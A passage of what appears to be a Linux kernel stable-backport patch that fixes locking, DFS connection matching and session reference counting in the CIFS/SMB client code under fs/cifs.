+ 	 */
+-	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
++	mutex_lock(&server->refpath_lock);
++	if (!dfs_cache_noreq_find(server->leaf_fullpath + 1, NULL, &tl))
+ 		num_targets = dfs_cache_get_nr_tgts(&tl);
++	mutex_unlock(&server->refpath_lock);
+ 	if (!num_targets)
+ 		num_targets = 1;
+ 
+@@ -542,7 +545,9 @@ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ 		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+ 	} while (server->tcpStatus == CifsNeedReconnect);
+ 
+-	dfs_cache_noreq_update_tgthint(refpath, target_hint);
++	mutex_lock(&server->refpath_lock);
++	dfs_cache_noreq_update_tgthint(server->leaf_fullpath + 1, target_hint);
++	mutex_unlock(&server->refpath_lock);
+ 	dfs_cache_free_tgts(&tl);
+ 
+ 	/* Need to set up echo worker again once connection has been established */
+@@ -593,9 +598,7 @@ cifs_echo_request(struct work_struct *work)
+ 		goto requeue_echo;
+ 
+ 	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	if (rc)
+-		cifs_dbg(FYI, "Unable to send echo request to server: %s\n",
+-			 server->hostname);
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+ 
+ 	/* Check witness registrations */
+ 	cifs_swn_check();
+@@ -1011,10 +1014,8 @@ static void clean_demultiplex_info(struct TCP_Server_Info *server)
+ 		 */
+ 	}
+ 
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+ 	kfree(server->origin_fullpath);
+ 	kfree(server->leaf_fullpath);
+-#endif
+ 	kfree(server);
+ 
+ 	length = atomic_dec_return(&tcpSesAllocCount);
+@@ -1425,26 +1426,13 @@ match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	return true;
+ }
+ 
+-static bool dfs_src_pathname_equal(const char *s1, const char *s2)
+-{
+-	if (strlen(s1) != strlen(s2))
+-		return false;
+-	for (; *s1; s1++, s2++) {
+-		if (*s1 == '/' || *s1 == '\\') {
+-			if (*s2 != '/' && *s2 != '\\')
+-				return false;
+-		} else if (tolower(*s1) != tolower(*s2))
+-			return false;
+-	}
+-	return true;
+-}
+-
+ /* this function must be called with srv_lock held */
+-static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx,
+-			bool dfs_super_cmp)
++static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+ 	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+ 
++	lockdep_assert_held(&server->srv_lock);
++
+ 	if (ctx->nosharesock)
+ 		return 0;
+ 
+@@ -1470,27 +1458,41 @@ static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *
+ 			       (struct sockaddr *)&server->srcaddr))
+ 		return 0;
+ 	/*
+-	 * When matching DFS superblocks, we only check for original source pathname as the
+-	 * currently connected target might be different than the one parsed earlier in i.e.
+-	 * mount.cifs(8).
++	 * - Match for an DFS tcon (@server->origin_fullpath).
++	 * - Match for an DFS root server connection (@server->leaf_fullpath).
++	 * - If none of the above and @ctx->leaf_fullpath is set, then
++	 *   it is a new DFS connection.
++	 * - If 'nodfs' mount option was passed, then match only connections
++	 *   that have no DFS referrals set
++	 *   (e.g. can't failover to other targets).
+ 	 */
+-	if (dfs_super_cmp) {
+-		if (!ctx->source || !server->origin_fullpath ||
+-		    !dfs_src_pathname_equal(server->origin_fullpath, ctx->source))
+-			return 0;
+-	} else {
+-		/* Skip addr, hostname and port matching for DFS connections */
+-		if (server->leaf_fullpath) {
++	if (!ctx->nodfs) {
++		if (ctx->source && server->origin_fullpath) {
++			if (!dfs_src_pathname_equal(ctx->source,
++						    server->origin_fullpath))
++				return 0;
++		} else if (server->leaf_fullpath) {
+ 			if (!ctx->leaf_fullpath ||
+-			    strcasecmp(server->leaf_fullpath, ctx->leaf_fullpath))
++			    strcasecmp(server->leaf_fullpath,
++				       ctx->leaf_fullpath))
+ 				return 0;
+-		} else if (strcasecmp(server->hostname, ctx->server_hostname) ||
+-			   !match_server_address(server, addr) ||
+-			   !match_port(server, addr)) {
++		} else if (ctx->leaf_fullpath) {
+ 			return 0;
+ 		}
++	} else if (server->origin_fullpath || server->leaf_fullpath) {
++		return 0;
+ 	}
+ 
++	/*
++	 * Match for a regular connection (address/hostname/port) which has no
++	 * DFS referrals set.
++	 */
++	if (!server->origin_fullpath && !server->leaf_fullpath &&
++	    (strcasecmp(server->hostname, ctx->server_hostname) ||
++	     !match_server_address(server, addr) ||
++	     !match_port(server, addr)))
++		return 0;
++
+ 	if (!match_security(server, ctx))
+ 		return 0;
+ 
+@@ -1521,7 +1523,7 @@ cifs_find_tcp_session(struct smb3_fs_context *ctx)
+ 		 * Skip ses channels since they're only handled in lower layers
+ 		 * (e.g. cifs_send_recv).
+ 		 */
+-		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx, false)) {
++		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
+ 			spin_unlock(&server->srv_lock);
+ 			continue;
+ 		}
+@@ -1622,7 +1624,6 @@ cifs_get_tcp_session(struct smb3_fs_context *ctx,
+ 			rc = -ENOMEM;
+ 			goto out_err;
+ 		}
+-		tcp_ses->current_fullpath = tcp_ses->leaf_fullpath;
+ 	}
+ 
+ 	if (ctx->nosharesock)
+@@ -1859,7 +1860,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	if (tcon == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock(&server->srv_lock);
+ 	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
+ 
+ 	xid = get_xid();
+ 	tcon->ses = ses;
+@@ -1912,7 +1915,7 @@ cifs_free_ipc(struct cifs_ses *ses)
+ static struct cifs_ses *
+ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+-	struct cifs_ses *ses;
++	struct cifs_ses *ses, *ret = NULL;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+@@ -1922,23 +1925,22 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			continue;
+ 		}
+ 		spin_lock(&ses->chan_lock);
+-		if (!match_session(ses, ctx)) {
++		if (match_session(ses, ctx)) {
+ 			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+-			continue;
++			ret = ses;
++			break;
+ 		}
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+-
+-		++ses->ses_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return ses;
+ 	}
++	if (ret)
++		cifs_smb_ses_inc_refcount(ret);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
++	return ret;
+ }
+ 
+-void cifs_put_smb_ses(struct cifs_ses *ses)
++void __cifs_put_smb_ses(struct cifs_ses *ses)
+ {
+ 	unsigned int rc, xid;
+ 	unsigned int chan_count;
+@@ -2289,6 +2291,8 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	 */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	ses->dfs_root_ses = ctx->dfs_root_ses;
++	if (ses->dfs_root_ses)
++		ses->dfs_root_ses->ses_count++;
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2305,12 +2309,15 @@ get_ses_fail:
+ }
+ 
+ /* this function must be called with tc_lock held */
+-static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx, bool dfs_super_cmp)
++static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+ {
++	struct TCP_Server_Info *server = tcon->ses->server;
++
+ 	if (tcon->status == TID_EXITING)
+ 		return 0;
+-	/* Skip UNC validation when matching DFS superblocks */
+-	if (!dfs_super_cmp && strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
++	/* Skip UNC validation when matching DFS connections or superblocks */
++	if (!server->origin_fullpath && !server->leaf_fullpath &&
++	    strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
+ 		return 0;
+ 	if (tcon->seal != ctx->seal)
+ 		return 0;
+@@ -2333,7 +2340,7 @@ cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 		spin_lock(&tcon->tc_lock);
+-		if (!match_tcon(tcon, ctx, false)) {
++		if (!match_tcon(tcon, ctx)) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			continue;
+ 		}
+@@ -2704,9 +2711,11 @@ compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+ 	return 1;
+ }
+ 
+-static int
+-match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++static int match_prepath(struct super_block *sb,
++			 struct TCP_Server_Info *server,
++			 struct cifs_mnt_data *mnt_data)
+ {
++	struct smb3_fs_context *ctx = mnt_data->ctx;
+ 	struct cifs_sb_info *old = CIFS_SB(sb);
+ 	struct cifs_sb_info *new = mnt_data->cifs_sb;
+ 	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+@@ -2714,6 +2723,10 @@ match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+ 	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+ 		new->prepath;
+ 
++	if (server->origin_fullpath &&
++	    dfs_src_pathname_equal(server->origin_fullpath, ctx->source))
++		return 1;
++
+ 	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
+ 		return 1;
+ 	else if (!old_set && !new_set)
+@@ -2732,7 +2745,6 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct tcon_link *tlink;
+-	bool dfs_super_cmp;
+ 	int rc = 0;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+@@ -2747,18 +2759,16 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	ses = tcon->ses;
+ 	tcp_srv = ses->server;
+ 
+-	dfs_super_cmp = IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && tcp_srv->origin_fullpath;
+-
+ 	ctx = mnt_data->ctx;
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+-	if (!match_server(tcp_srv, ctx, dfs_super_cmp) ||
++	if (!match_server(tcp_srv, ctx) ||
+ 	    !match_session(ses, ctx) ||
+-	    !match_tcon(tcon, ctx, dfs_super_cmp) ||
+-	    !match_prepath(sb, mnt_data)) {
++	    !match_tcon(tcon, ctx) ||
++	    !match_prepath(sb, tcp_srv, mnt_data)) {
+ 		rc = 0;
+ 		goto out;
+ 	}
+@@ -3503,8 +3513,6 @@ out:
+ 
+ error:
+ 	dfs_put_root_smb_sessions(&mnt_ctx.dfs_ses_list);
+-	kfree(mnt_ctx.origin_fullpath);
+-	kfree(mnt_ctx.leaf_fullpath);
+ 	cifs_mount_put_conns(&mnt_ctx);
+ 	return rc;
+ }
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index c8bda52fa096c..4c392bde24066 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -99,7 +99,7 @@ static int get_session(struct cifs_mount_ctx *mnt_ctx, const char *full_path)
+ 	return rc;
+ }
+ 
+-static int get_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
++static int add_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_root_ses *root_ses;
+@@ -127,7 +127,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_info3_param ref = {};
+-	bool is_refsrv = false;
++	bool is_refsrv;
+ 	int rc, rc2;
+ 
+ 	rc = dfs_cache_get_tgt_referral(ref_path + 1, tit, &ref);
+@@ -158,7 +158,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 	}
+ 
+ 	if (rc == -EREMOTE && is_refsrv) {
+-		rc2 = get_root_smb_session(mnt_ctx);
++		rc2 = add_root_smb_session(mnt_ctx);
+ 		if (rc2)
+ 			rc = rc2;
+ 	}
+@@ -248,11 +248,12 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 		tcon = mnt_ctx->tcon;
+ 
+ 		mutex_lock(&server->refpath_lock);
++		spin_lock(&server->srv_lock);
+ 		if (!server->origin_fullpath) {
+ 			server->origin_fullpath = origin_fullpath;
+-			server->current_fullpath = server->leaf_fullpath;
+ 			origin_fullpath = NULL;
+ 		}
++		spin_unlock(&server->srv_lock);
+ 		mutex_unlock(&server->refpath_lock);
+ 
+ 		if (list_empty(&tcon->dfs_ses_list)) {
+@@ -272,15 +273,21 @@ out:
+ 
+ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ {
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct cifs_ses *ses;
++	char *source = ctx->source;
++	bool nodfs = ctx->nodfs;
+ 	int rc;
+ 
+ 	*isdfs = false;
+-
++	/* Temporarily set @ctx->source to NULL as we're not matching DFS
++	 * superblocks yet.  See cifs_match_super() and match_server().
++	 */
++	ctx->source = NULL;
+ 	rc = get_session(mnt_ctx, NULL);
+ 	if (rc)
+-		return rc;
++		goto out;
++
+ 	ctx->dfs_root_ses = mnt_ctx->ses;
+ 	/*
+ 	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
+@@ -289,23 +296,41 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
+ 	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
+ 	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    dfs_get_referral(mnt_ctx, ctx->UNC + 1, NULL, NULL)) {
++	if (!nodfs) {
++		rc = dfs_get_referral(mnt_ctx, ctx->UNC + 1, NULL, NULL);
++		if (rc) {
++			if (rc != -ENOENT && rc != -EOPNOTSUPP)
++				goto out;
++			nodfs = true;
++		}
++	}
++	if (nodfs) {
+ 		rc = cifs_mount_get_tcon(mnt_ctx);
+-		if (rc)
+-			return rc;
+-
+-		rc = cifs_is_path_remote(mnt_ctx);
+-		if (!rc || rc != -EREMOTE)
+-			return rc;
++		if (!rc)
++			rc = cifs_is_path_remote(mnt_ctx);
++		goto out;
+ 	}
+ 
+ 	*isdfs = true;
+-	rc = get_root_smb_session(mnt_ctx);
+-	if (rc)
+-		return rc;
+-
+-	return __dfs_mount_share(mnt_ctx);
++	/*
++	 * Prevent DFS root session of being put in the first call to
++	 * cifs_mount_put_conns().  If another DFS root server was not found
++	 * while chasing the referrals (@ctx->dfs_root_ses == @ses), then we
++	 * can safely put extra refcount of @ses.
++	 */
++	ses = mnt_ctx->ses;
++	mnt_ctx->ses = NULL;
++	mnt_ctx->server = NULL;
++	rc = __dfs_mount_share(mnt_ctx);
++	if (ses == ctx->dfs_root_ses)
++		cifs_put_smb_ses(ses);
++out:
++	/*
++	 * Restore previous value of @ctx->source so DFS superblock can be
++	 * matched in cifs_match_super().
++	 */
++	ctx->source = source;
++	return rc;
+ }
+ 
+ /* Update dfs referral path of superblock */
+@@ -342,10 +367,11 @@ static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb
+ 		rc = PTR_ERR(npath);
+ 	} else {
+ 		mutex_lock(&server->refpath_lock);
++		spin_lock(&server->srv_lock);
+ 		kfree(server->leaf_fullpath);
+ 		server->leaf_fullpath = npath;
++		spin_unlock(&server->srv_lock);
+ 		mutex_unlock(&server->refpath_lock);
+-		server->current_fullpath = server->leaf_fullpath;
+ 	}
+ 	return rc;
+ }
+@@ -374,6 +400,54 @@ static int target_share_matches_server(struct TCP_Server_Info *server, char *sha
+ 	return rc;
+ }
+ 
++static void __tree_connect_ipc(const unsigned int xid, char *tree,
++			       struct cifs_sb_info *cifs_sb,
++			       struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++	int rc;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	if (cifs_chan_needs_reconnect(ses, server) ||
++	    ses->ses_status != SES_GOOD) {
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		cifs_server_dbg(FYI, "%s: skipping ipc reconnect due to disconnected ses\n",
++				__func__);
++		return;
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	cifs_server_lock(server);
++	scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++	cifs_server_unlock(server);
++
++	rc = server->ops->tree_connect(xid, ses, tree, tcon,
++				       cifs_sb->local_nls);
++	cifs_server_dbg(FYI, "%s: tree_reconnect %s: %d\n", __func__, tree, rc);
++	spin_lock(&tcon->tc_lock);
++	if (rc) {
++		tcon->status = TID_NEED_TCON;
++	} else {
++		tcon->status = TID_GOOD;
++		tcon->need_reconnect = false;
++	}
++	spin_unlock(&tcon->tc_lock);
++}
++
++static void tree_connect_ipc(const unsigned int xid, char *tree,
++			     struct cifs_sb_info *cifs_sb,
++			     struct cifs_tcon *tcon)
++{
++	struct cifs_ses *ses = tcon->ses;
++
++	__tree_connect_ipc(xid, tree, cifs_sb, ses);
++	__tree_connect_ipc(xid, tree, cifs_sb, CIFS_DFS_ROOT_SES(ses));
++}
++
+ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+ 				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+ 				     struct dfs_cache_tgt_list *tl)
+@@ -382,7 +456,6 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	const struct smb_version_operations *ops = server->ops;
+ 	struct cifs_ses *root_ses = CIFS_DFS_ROOT_SES(tcon->ses);
+-	struct cifs_tcon *ipc = root_ses->tcon_ipc;
+ 	char *share = NULL, *prefix = NULL;
+ 	struct dfs_cache_tgt_iterator *tit;
+ 	bool target_match;
+@@ -403,7 +476,7 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 		share = prefix = NULL;
+ 
+ 		/* Check if share matches with tcp ses */
+-		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
++		rc = dfs_cache_get_tgt_share(server->leaf_fullpath + 1, tit, &share, &prefix);
+ 		if (rc) {
+ 			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
+ 			break;
+@@ -417,19 +490,15 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 			continue;
+ 		}
+ 
+-		dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
+-
+-		if (ipc->need_reconnect) {
+-			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
+-			cifs_dbg(FYI, "%s: reconnect ipc: %d\n", __func__, rc);
+-		}
++		dfs_cache_noreq_update_tgthint(server->leaf_fullpath + 1, tit);
++		tree_connect_ipc(xid, tree, cifs_sb, tcon);
+ 
+ 		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
+ 		if (!islink) {
+ 			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+ 			break;
+ 		}
++
+ 		/*
+ 		 * If no dfs referrals were returned from link target, then just do a TREE_CONNECT
+ 		 * to it.  Otherwise, cache the dfs referral and then mark current tcp ses for
+@@ -535,8 +604,8 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 	cifs_sb = CIFS_SB(sb);
+ 
+ 	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
+-	if (!server->current_fullpath ||
+-	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
++	if (!server->leaf_fullpath ||
++	    dfs_cache_noreq_find(server->leaf_fullpath + 1, &ref, &tl)) {
+ 		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
+ 		goto out;
+ 	}
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 0b8cbf721fff6..1c90df5ecfbda 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -43,8 +43,12 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 	size_t len;
+ 	char *s;
+ 
+-	if (unlikely(!server->origin_fullpath))
++	spin_lock(&server->srv_lock);
++	if (unlikely(!server->origin_fullpath)) {
++		spin_unlock(&server->srv_lock);
+ 		return ERR_PTR(-EREMOTE);
++	}
++	spin_unlock(&server->srv_lock);
+ 
+ 	s = dentry_path_raw(dentry, page, PATH_MAX);
+ 	if (IS_ERR(s))
+@@ -53,13 +57,18 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 	if (!s[1])
+ 		s++;
+ 
++	spin_lock(&server->srv_lock);
+ 	len = strlen(server->origin_fullpath);
+-	if (s < (char *)page + len)
++	if (s < (char *)page + len) {
++		spin_unlock(&server->srv_lock);
+ 		return ERR_PTR(-ENAMETOOLONG);
++	}
+ 
+ 	s -= len;
+ 	memcpy(s, server->origin_fullpath, len);
++	spin_unlock(&server->srv_lock);
+ 	convert_delimiter(s, '/');
++
+ 	return s;
+ }
+ 
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 1c59811bfa73a..9ccaa0c7ac943 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -1278,8 +1278,12 @@ static void refresh_cache_worker(struct work_struct *work)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		if (!server->leaf_fullpath)
++		spin_lock(&server->srv_lock);
++		if (!server->leaf_fullpath) {
++			spin_unlock(&server->srv_lock);
+ 			continue;
++		}
++		spin_unlock(&server->srv_lock);
+ 
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			if (ses->tcon_ipc) {
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index a53ddc81b698c..bef7c335ccc6e 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5096,6 +5096,8 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+ 	bool purge_cache = false;
++	struct cifs_deferred_close *dclose;
++	bool is_deferred = false;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5131,6 +5133,20 @@ void cifs_oplock_break(struct work_struct *work)
+ 		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+ 
+ oplock_break_ack:
++	/*
++	 * When oplock break is received and there are no active
++	 * file handles but cached, then schedule deferred close immediately.
++	 * So, new open will not use cached handle.
++	 */
++	spin_lock(&CIFS_I(inode)->deferred_lock);
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	spin_unlock(&CIFS_I(inode)->deferred_lock);
++
++	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
++			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++		cifs_close_deferred_file(cinode);
++	}
++
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
+diff --git a/fs/cifs/ioctl.c b/fs/cifs/ioctl.c
+index 6419ec47c2a85..cb3be58cd55eb 100644
+--- a/fs/cifs/ioctl.c
++++ b/fs/cifs/ioctl.c
+@@ -239,7 +239,7 @@ static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug
+ 					 * section, we need to make sure it won't be released
+ 					 * so increment its refcount
+ 					 */
+-					ses->ses_count++;
++					cifs_smb_ses_inc_refcount(ses);
+ 					found = true;
+ 					goto search_end;
+ 				}
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 2fae6b08314d9..ee0a3c3f6b1d6 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -749,7 +749,9 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -762,7 +764,7 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	spin_unlock(&cifs_inode->open_file_lock);
+ 
+ 	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
+ 		list_del(&tmp_list->list);
+ 		kfree(tmp_list);
+ 	}
+@@ -780,7 +782,9 @@ cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+ 	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -815,7 +819,9 @@ cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+ 		if (strstr(full_path, path)) {
+ 			if (delayed_work_pending(&cfile->deferred)) {
+ 				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 					if (tmp_list == NULL)
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index c47b254f0d1e2..81be17845072a 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -159,6 +159,7 @@ cifs_chan_is_iface_active(struct cifs_ses *ses,
+ /* returns number of channels added */
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ {
++	struct TCP_Server_Info *server = ses->server;
+ 	int old_chan_count, new_chan_count;
+ 	int left;
+ 	int rc = 0;
+@@ -178,16 +179,16 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		return 0;
+ 	}
+ 
+-	if (ses->server->dialect < SMB30_PROT_ID) {
++	if (server->dialect < SMB30_PROT_ID) {
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+ 		return 0;
+ 	}
+ 
+-	if (!(ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+ 		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "server %s does not support multichannel\n", ses->server->hostname);
++		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index ab59faf8a06a7..0550be60dce44 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -175,8 +175,17 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+-	if ((!tcon->ses) || (tcon->ses->ses_status == SES_EXITING) ||
+-	    (!tcon->ses->server) || !server)
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
+ 		return -EIO;
+ 
+ 	spin_lock(&server->srv_lock);
+@@ -204,8 +213,6 @@ again:
+ 	if (rc)
+ 		return rc;
+ 
+-	ses = tcon->ses;
+-
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+ 		spin_unlock(&ses->chan_lock);
